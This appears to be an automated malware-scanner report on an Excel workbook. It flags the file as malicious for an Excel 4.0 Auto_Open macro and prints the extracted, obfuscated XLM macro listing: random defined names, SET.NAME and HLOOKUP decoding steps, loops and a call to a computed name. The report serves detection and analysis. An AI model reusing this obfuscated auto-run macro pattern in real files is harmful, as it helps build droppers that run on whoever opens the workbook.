MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6900 bytes |
SHA-256: 437bdb893d13ef5222300489b73be6e93bebfc54c66f06424abd230a5959e697 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cZXLHVMAha
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G176
' 0018 21 LABEL : Cell Value, String Constant - dflzQr len=0
' 0018 25 LABEL : Cell Value, String Constant - eeTfhaqnrg len=0
' 0018 20 LABEL : Cell Value, String Constant - epxzV len=0
' 0018 23 LABEL : Cell Value, String Constant - EQEnfKaE len=0
' 0018 27 LABEL : Cell Value, String Constant - GQMFSzSCTxKU len=0
' 0018 20 LABEL : Cell Value, String Constant - HGdFz len=0
' 0018 27 LABEL : Cell Value, String Constant - JPNgfJVQtDkI len=0
' 0018 20 LABEL : Cell Value, String Constant - lHxJf len=0
' 0018 24 LABEL : Cell Value, String Constant - LpozcBdHB len=0
' 0018 24 LABEL : Cell Value, String Constant - LSRqIZEvl len=0
' 0018 25 LABEL : Cell Value, String Constant - lUFRNOYwJo len=0
' 0018 20 LABEL : Cell Value, String Constant - LxkxQ len=0
' 0018 21 LABEL : Cell Value, String Constant - NBNPmj len=0
' 0018 27 LABEL : Cell Value, String Constant - ogURyEtLWcot len=0
' 0018 27 LABEL : Cell Value, String Constant - OWdnPidJwLNA len=0
' 0018 27 LABEL : Cell Value, String Constant - PeiSzvWAIZOy len=0
' 0018 27 LABEL : Cell Value, String Constant - rSOqZMxjPvIW len=0
' 0018 27 LABEL : Cell Value, String Constant - TtZfPTorCnem len=0
' 0018 21 LABEL : Cell Value, String Constant - vpKxbs len=0
' 0018 23 LABEL : Cell Value, String Constant - XRRSSnGe len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cZXLHVMAha,Q93,"",-758.00000000000000000000
' cZXLHVMAha,G94,"SET.NAME("lUFRNOYwJo",0+VALUE("0"))",""
' cZXLHVMAha,Q94,"",829.00000000000000000000
' cZXLHVMAha,Q95,"",425.00000000000000000000
' cZXLHVMAha,Q96,"",-623.00000000000000000000
' cZXLHVMAha,Q97,"",-980.00000000000000000000
' cZXLHVMAha,Q98,"",411.00000000000000000000
' cZXLHVMAha,G99,"SET.NAME("epxzV",lUFRNOYwJo)",""
' cZXLHVMAha,G101,"SET.NAME("eeTfhaqnrg",lUFRNOYwJo)",""
' cZXLHVMAha,G106,"SET.NAME("EQEnfKaE",COUNTA(LSRqIZEvl))",""
' cZXLHVMAha,G108,"SET.NAME("HGdFz",COUNTA(vpKxbs))",""
' cZXLHVMAha,G111,[],""
' cZXLHVMAha,G115,"SET.NAME("XRRSSnGe","")",""
' cZXLHVMAha,G118,"epxzV",""
' cZXLHVMAha,G121,"SET.NAME("JPNgfJVQtDkI",HLOOKUP("*",LSRqIZEvl,epxzV,FALSE))",""
' cZXLHVMAha,G124,"rSOqZMxjPvIW",""
' cZXLHVMAha,G128,"SET.NAME("NBNPmj",lUFRNOYwJo)",""
' cZXLHVMAha,G131,[],""
' cZXLHVMAha,G133,"NBNPmj",""
' cZXLHVMAha,G135,"dflzQr",""
' cZXLHVMAha,G137,"TtZfPTorCnem",""
' cZXLHVMAha,G139,"ogURyEtLWcot",""
' cZXLHVMAha,G141,"SET.NAME("OWdnPidJwLNA",VALUE(HLOOKUP("*",vpKxbs,ogURyEtLWcot,FALSE)))",""
' cZXLHVMAha,G144,"GQMFSzSCTxKU",""
' cZXLHVMAha,G146,"XRRSSnGe",""
' cZXLHVMAha,G151,"eeTfhaqnrg",""
' cZXLHVMAha,G154,NEXT(),""
' cZXLHVMAha,G159,"LxkxQ",""
' cZXLHVMAha,G163,[],""
' cZXLHVMAha,G167,"lHxJf",""
' cZXLHVMAha,G169,NEXT(),""
' cZXLHVMAha,G174,RETURN(),""
' cZXLHVMAha,G196,"SET.NAME("LpozcBdHB",G94)",""
' cZXLHVMAha,G198,"LSRqIZEvl",""
' cZXLHVMAha,G203,"SET.NAME("vpKxbs",R73C15)",""
' cZXLHVMAha,G207,"SET.NAME("lHxJf",215)",""
' cZXLHVMAha,G210,"SET.NAME("PeiSzvWAIZOy",7)",""
' cZXLHVMAha,G214,LpozcBdHB(),""
' cZXLHVMAha,G215,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.